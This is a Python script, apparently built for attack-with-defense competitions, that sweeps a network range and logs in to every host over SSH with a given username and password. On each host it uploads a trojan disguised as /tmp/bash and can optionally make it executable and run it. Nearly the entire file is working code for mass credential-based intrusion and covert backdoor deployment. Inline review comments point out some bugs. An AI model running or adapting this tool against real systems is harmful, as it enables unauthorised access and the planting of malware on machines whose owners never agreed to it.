# Used in AWD (attack-with-defense) matches to batch-upload a backdoor to
# accounts that have weak passwords.
# Built on paramiko and scp (the original note naming the libraries is cut
# short; the imports below show what is used).
# By default the file is uploaded to /tmp/bash so that it is disguised as a shell.
# With the --exec option the uploaded file can be executed covertly after upload.
#
# What a run leaves on a target, as far as the code below shows:
#   * a password-authenticated SSH login for every address in the --target network,
#   * a file written over SCP to /tmp/bash (or to the --destpath value),
#   * with --exec, an SSH exec request for "chmod +x /tmp/bash&&/tmp/bash".
# Every step depends on the target's SSH service accepting the supplied
# username/password pair.
import paramiko
from scp import SCPClient
import argparse
import re
import ipaddress
import os


def Upload_Trojans(host, port, source_path, username, password, dest_path="/tmp/bash"):
    """Copy ``source_path`` to ``dest_path`` on ``host`` over SSH/SCP.

    Returns 1 when the copy went through and 0 when the local file was
    missing (FileNotFoundError). Any other exception, including a failed
    SSH connection or login, is not caught here and reaches the caller.
    """
    session = paramiko.SSHClient()
    # AutoAddPolicy: an unknown host key is accepted rather than rejected.
    session.set_missing_host_key_policy(paramiko.AutoAddPolicy)
    session.connect(host, port, username, password)
    copier = SCPClient(session.get_transport(), socket_timeout=15.0)
    try:
        copier.put(source_path, dest_path)
    except FileNotFoundError as err:
        print(err)
        print("Can't find the file")
        status = 0
    else:
        print(host + " upload success")
        status = 1
    session.close()
    return status


def Get_Target(target):
    """Expand ``target`` (an address or CIDR network) into a list of IP strings.

    The value is parsed with strict=False, so host bits in the input are
    ignored. Every address the network object iterates over is returned.
    Exits the process with a message when ``target`` cannot be parsed.
    """
    try:
        network = ipaddress.ip_network(target, False)
    except Exception:
        exit("The correct IP is required")
    return [str(address) for address in network]


def Get_Trojan(trojan):
    """Return the absolute path of ``trojan``; exit if it is not a regular file."""
    if not os.path.isfile(trojan):
        exit("Can't find the file")
    return os.path.abspath(trojan)


def Exec_Backdoor(host, port, username, password):
    """Open an SSH session to ``host`` and run the file at /tmp/bash.

    The command path is fixed in this function; it does not take the upload
    destination as a parameter. Returns 1 after the exec request was sent.
    """
    session = paramiko.SSHClient()
    session.set_missing_host_key_policy(paramiko.AutoAddPolicy)
    session.connect(host, port, username, password)
    try:
        command = "chmod +x /tmp/bash&&/tmp/bash"
        session.exec_command(command)
    # NOTE(review): CommandError is neither imported nor defined in this file,
    # so this handler cannot match; an exception from exec_command would
    # surface as a NameError raised while evaluating the except clause.
    except CommandError as err:
        print(err)
        print("Can't execute the command")
        status = 0
    else:
        print(host + " execute success")
        status = 1
    session.close()
    return status


if __name__ == '__main__':
    cli = argparse.ArgumentParser()
    cli.add_argument('--target', required=True, help='ip address')
    cli.add_argument('--trojan', required=True, help='trojan path')
    cli.add_argument('--username', required=True, help='target username')
    cli.add_argument('--password', required=True, help='target password')
    cli.add_argument('--destpath', default="/tmp/bash",
                     help='destination path, default is /tmp/bash')
    # The port stays a string ("22" by default) and is passed on unchanged.
    cli.add_argument('--port', default="22",
                     help="destination port, default is 22")
    cli.add_argument('--exec', action='store_true', help="execute the trojan")
    args = cli.parse_args()

    target_list = Get_Target(args.target)
    trojan = Get_Trojan(args.trojan)
    username = args.username
    password = args.password
    dest_path = args.destpath
    port = args.port

    # One pass over the hosts: always upload, and run the file only with --exec.
    for host in target_list:
        Upload_Trojans(host, port, trojan, username, password, dest_path)
        if args.exec:
            Exec_Backdoor(host, port, username, password)